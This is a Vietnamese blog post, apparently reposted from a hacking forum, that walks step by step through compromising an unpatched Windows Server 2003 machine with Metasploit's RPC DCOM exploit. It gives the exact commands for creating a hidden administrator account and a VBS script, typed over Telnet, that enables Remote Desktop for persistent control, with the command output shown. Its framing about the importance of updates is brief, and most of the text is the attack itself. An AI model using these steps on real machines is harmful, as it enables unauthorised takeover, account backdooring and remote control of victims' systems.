Trao đổi với tôi

www.hdphim.info

12/13/09

[Hacking] Tầm quan trọng của Update (Metasploit Attack)

Tầm quan trọng của Update (Metasploit Attack)


Chúng ta , người dùng thường ít ai bât windows update lên vi sợ khi update lên làm máy của mình ngày chậm chạp. Như vậy thì lỗi thì càng lúc càng nhiều mà bản vá thì lại không được update và sẽ bị hacker lợi dụng tấn công máy của bạn.
Hôm nay mình giới thiệu cho bạn một cách đơn giản mà hacker thường lợi dụng để tấn công các máy không được cập nhật các bản vá.

Tool sử dụng: Metaslpoit 3
Mô hình : Mô hình của chúng ta là, LK đang đứng trên máy attacker xài w2k3 có IP có IP là 10.19.139.180 và attack vào máy victim chạy w2k3 chưa được update với IP là 10.19.139.181Mục đích : Nắm quyền của máy DC2 và remote desktop qua DC2
Thực hiện:
Đầu tiên bạn cần phải cài đặt Metasploit :Sau khi cài đặt xong ta chạy với Mestasploit GUIGiao diện nhìn ngàu thật:
Tiếp theo ta chọn Exploit  Windows  dcerpc . Và ta sẽ chọn bug : Microsoft RPC DCOM Interface Overflow để khai thác.
Right click –> chọn Excute- Tiếp theo bạn chọn Forward ở bước chọn target.- Ta chọn windows/shell/shell_blind_tcp rồi bấm forward- Bước tiếp theo ta nhập ip của target vào :- Sau đó bạn chọn apply ở bước tiếp theo
- Sau khi apply thành công thì bạn đã tạo được session đến máy victim rùi . ban chỉ cần chọn “Interact Session” để kết nối vào máy victim- Hihi như vậy bạn đã nẳm trong cmd của victim rùi .- Việc đầu tiên mình làm sẽ là change pass administrator hoặc là tạo 1 user và add vào group administrator (Mình đang đứng với quyền administrator nên có thể làm tất cả)
+ Ở đây mình tạo user luongkhiem và add vào group administrator bằng 2 câu lệnh
Trích:
C:\WINDOWS\system32>net user luongkhiem 123 /add
net user luongkhiem 123 /add
The command completed successfully.


C:\WINDOWS\system32>net localgroup administrators luongkhiem /add
net localgroup administrators luongkhiem /add
The command completed successfully.
- Như vậy mình đã là quyền administrator bây giờ mục đích còn lại của mình là remote desktop vào máy victim . Đầu tiên ta kiểm tra coi máy victim có mở remote desktop hay không bằng cách dùng lệnh netstat

- Như vậy là máy victim ko có mở port 3339 . như vậy ta cần phải tìm cách open port này .
- Trước tiên cần coi máy đang chạy những dịch vụ vào
Trích:
C:\WINDOWS\system32>net start
These Windows services are started:

Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DHCP Client
Distributed File System
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
Internet Connection Firewall (ICF) / Internet Connect
IPSEC Services
Logical Disk Manager
Network Connections
Network Location Awareness (NLA)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Telnet
Terminal Services
VMware Tools Service
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation

The command completed successfully.
- Như vậy là máy victim có chạy telnet ! ta telnet vào máy victim và command nào
Trích:
*================================================= ==============
Welcome to Microsoft Telnet Server.
*================================================= ==============
C:\>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.19.139.181
Subnet Mask . . . . . . . . . . . : 255.0.0.0
Default Gateway . . . . . . . . . : 10.19.128.1

C:\>copy con remote.vbs
machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ' 0=off, 1=on


set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )

for each item in items

item.SetAllowTSConnections( value_to_set )

next^Z
1 file(s) copied.

C:\>dir
Volume in drive C has no label.
Volume Serial Number is C022-B43C

Directory of C:\

12/19/2008 10:36 PM 0 AUTOEXEC.BAT
12/19/2008 10:36 PM 0 CONFIG.SYS
12/28/2008 01:29 PM < dir> Documents and Settings
12/27/2008 10:14 PM 0 lk.vbs
12/27/2008 10:32 PM 0 net
12/21/2008 09:48 PM < dir> Program Files
12/28/2008 01:29 PM 321 remote.vbs
12/27/2008 07:40 PM < dir> WINDOWS
12/19/2008 10:37 PM < dir> wmpub
5 File(s) 321 bytes
4 Dir(s) 105,423,151,104 bytes free

C:\>remote.vbs

C:\>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:23 0.0.0.0:0 LISTENING 1140
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 528
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 968
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 752
TCP 10.19.139.181:23 10.19.139.180:3027 ESTABLISHED 1140
TCP 10.19.139.181:139 0.0.0.0:0 LISTENING 4
TCP 10.19.139.181:445 10.19.139.180:3024 ESTABLISHED 4
TCP 10.19.139.181:4444 10.19.139.180:3020 ESTABLISHED 700
TCP 127.0.0.1:3001 0.0.0.0:0 LISTENING 1272
TCP 127.0.0.1:3002 0.0.0.0:0 LISTENING 968
TCP 127.0.0.1:3003 0.0.0.0:0 LISTENING 968
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 528
UDP 0.0.0.0:1027 *:* 908
UDP 0.0.0.0:3005 *:* 968
UDP 0.0.0.0:4500 *:* 528
UDP 10.19.139.181:123 *:* 968
UDP 10.19.139.181:137 *:* 4
UDP 10.19.139.181:138 *:* 4
UDP 127.0.0.1:123 *:* 968

C:\>mstsc


Như vậy đã đã hoàn toàn làm chủ được máy tính của victim .
Ngoài ra cũng còn có thể sử dụng cách Remote Registry để bật chức năng Remote Desktop của máy victim (Bữa nào rảnh LK sẽ viết để các bạn tham khảo)
Qua đây ta thấy tầm quan trọng của việc update windows.
Chúc các bạn thành công
luongkhiem
Link: http://thegioimang.org/forum/tham-nhap-trong-microsoft/1515-tam-quan-trong-cua-update-metasploit-attack.html

No comments:

Post a Comment